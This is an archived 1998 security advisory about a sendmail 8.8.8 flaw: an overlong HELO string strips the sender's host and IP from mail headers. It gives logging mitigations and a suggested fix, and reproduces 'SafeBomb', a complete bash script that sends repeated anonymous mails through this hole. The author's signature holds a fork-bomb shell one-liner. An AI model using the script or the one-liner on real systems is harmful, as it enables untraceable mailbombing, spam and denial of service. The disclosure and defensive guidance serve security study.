[ http://www.rootshell.com/ ] We've had this exploit since January but sat on it until everyone had a change of implementing a stable version of sendmail 8.9.x. (And because the last thing I want to do is help the spammers) It has now made its way to Bugtraq so without further ado. --Rootshell 5/28/98 Date: Fri, 22 May 1998 12:36:54 +0300 From: Valentin Pavlov Subject: about sendmail 8.8.8 HELO hole I assume this this is pretty old (10 Jan 1998) but still... I found a pretty simple way to prevent the hiding of the sender's IP address. The method to hide the IP address of the sender is described bellow. Now, if we want to keep track of such exploit attempts, we have to compile sendmail 8.8.8 with a PICKY_HELO_CHECK defined in conf.h: #define PICKY_HELO_CHECK 1 This will force sendmail to syslog an authentication warning (message with LOG_INFO level) and include an X-Authentication-Warning: header in the message, saying what host tried to hide itself. Check out the source (srvrsmpt.c, main.c). Also, LogLevel must be set to a value higher than 3 (default is 9) in sendmail.cf. regards, capone -=-=-=-=-=-=-=-=-=-=-=-=-=-= Make source, not [high]score ---------------------------- Valentin 'Val Capone' Pavlov ---------------------------- capone@netbg.com, UKTC87203 -=-=-=-=-=-=-=-=-=-=-=-=-=-= Now for the original message, describing the exploit: -----Original Message----- From: Michał Zalewski To: info@rootshell.com Date: 10 stycznia 1998 12:28 Subject: Sendmail 8.8.8 (qmail?) HELO hole. Here's a brief description of Sendmail (qmail) hole I found recently: When someone mailbombs you, or tries to send fakemail, spam, etc - sendmail normally attachs sender's host name and it's address to outgoing message: -- >From spam@flooders.net Mon Jan 5 22:08:21 1998 Received: from spammer (marc@math.university.edu [150.129.84.5]) by myhost.com (8.8.8/8.8.8) with SMTP id WAA00376 for lcamtuf; Mon, 5 Jan 1998 22:07:54 +0100 Date: Mon, 5 Jan 1998 22:07:54 +0100 From: spam@flooders.net Message-Id: <3.14159665@pi> MAILBOOM!!! -- That's perfect - now you know, who is responsible for that annoying junk in your mailbox: "Received: from spammer (marc@math.university.edu [150.129.84.5])". Nothing easier... But I found a small hole, which allows user to hide it's personality, and send mails anonymously. The only thing you should do is to pass HELO string longer than approx. 1024 B - sender's location and other very useful information will be cropped!!! Message headers should become not interesting. Sometimes, sender may become quite untraceable (but not always, if it's possible to obtain logs from machine which has been used to sent): -- >From spam@flooders.net Mon Jan 5 22:09:05 1998 Received: from xxxxxxxxxxxxxx... [a lot of 'x's] ...xxxx Date: Mon, 5 Jan 1998 22:08:52 +0100 From: spam@flooders.net Message-Id: <3.14159665@pi> MAILBOOM!!! Now guess who am I... -- Here's a simple example of Sendmail's HELO hole usage. Note, this script has been written ONLY to show how easy may be sending fakemails, mailbombs, with cooperation of Sendmail ;) Script is very slow and restricted in many ways, but explains the problem well (note, some of non-Berkeley daemons are also affected, probably Qmail?): -- EXPLOIT CODE -- #!/bin/bash TMPDIR=/tmp/`whoami` PLIK=$TMPDIR/.safe TIMEOUT=2 LIMIT=10 MAX=20 echo echo "SafeBomb 1.02b -- sendmail HELO hole usage example" echo "Author: Michal Zalewski " echo if [ "$4" = "" ]; then echo "USAGE: $0 msgfile address server sender" echo echo " msgfile - file to send as a message body" echo " address - address of lucky recipient" echo " server - outgoing smtp server w/sendmail" echo " sender - introduce yourself" echo echo "WARNING: For educational use ONLY. Mailbombing is illegal." echo "Think twice BEFORE you use this program in any way. Also," echo "I've never said this program is 100% safe nor bug-free." echo sleep 1 exit 0 fi if [ ! -f $1 ]; then echo "Message file not found." echo exit 0 fi echo -n "Preparing message..." mkdir $TMPDIR &>/dev/null chmod 700 $TMPDIR echo "echo \"helo _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__sa febomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__saf ebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safe bomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb omb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebo mb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebom b__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb b__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb __safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_ _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_\"" >$PLIK echo "echo \"mail from: \\\"$4\\\"\"" >>$PLIK echo "echo \"rcpt to: $2\"" >>$PLIK echo "echo \"data\"" >>$PLIK echo "cat <<__qniec__" >>$PLIK cat $1 >>$PLIK echo "__qniec__" >>$PLIK echo "echo \".\"" >>$PLIK echo "echo \"quit\"" >>$PLIK echo "sleep $TIMEOUT" >>$PLIK chmod +x $PLIK echo "OK" echo "Sending $1 (as $4) to $2 via $3 -- Ctrl+Z to abort." SENT=0 while [ -f $1 ]; do $PLIK|telnet $3 25 &>/dev/null & let SENT=SENT+1 echo -ne "Sent: $SENT\b\b\b\b\b\b\b\b\b\b\b\b\b" CONNECTED=`ps|grep -c "telnet $3"` if [ "$LIMIT" -le "$CONNECTED" ]; then while [ "$LIMIT" -le "$CONNECTED" ]; do sleep 1 done fi if [ "$SENT" -ge "$MAX" ]; then echo "It's just an example, sorry." echo exit 0 fi done -- EOF -- Suggested fix: insert additional length limit into HELO/EHLO parameter scanning routine OR disable AllowBogusHELO (but it may cause serious troubles). I have no 8.8.8 sources at the time, so execuse me if it's unclear. PS: -- From: Gregory Neil Shapiro I was able to reproduce the header problem by lengthening the HELO string in your script. [...] This will be fixed in sendmail 8.9. -- _______________________________________________________________________ Michał Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl] Iterować jest rzeczą ludzką, wykonywać rekursywnie - boską [P. Deustch] =--------- [ echo "while [ -f \$0 ]; do \$0 &;done" >_;. _ ] ---------=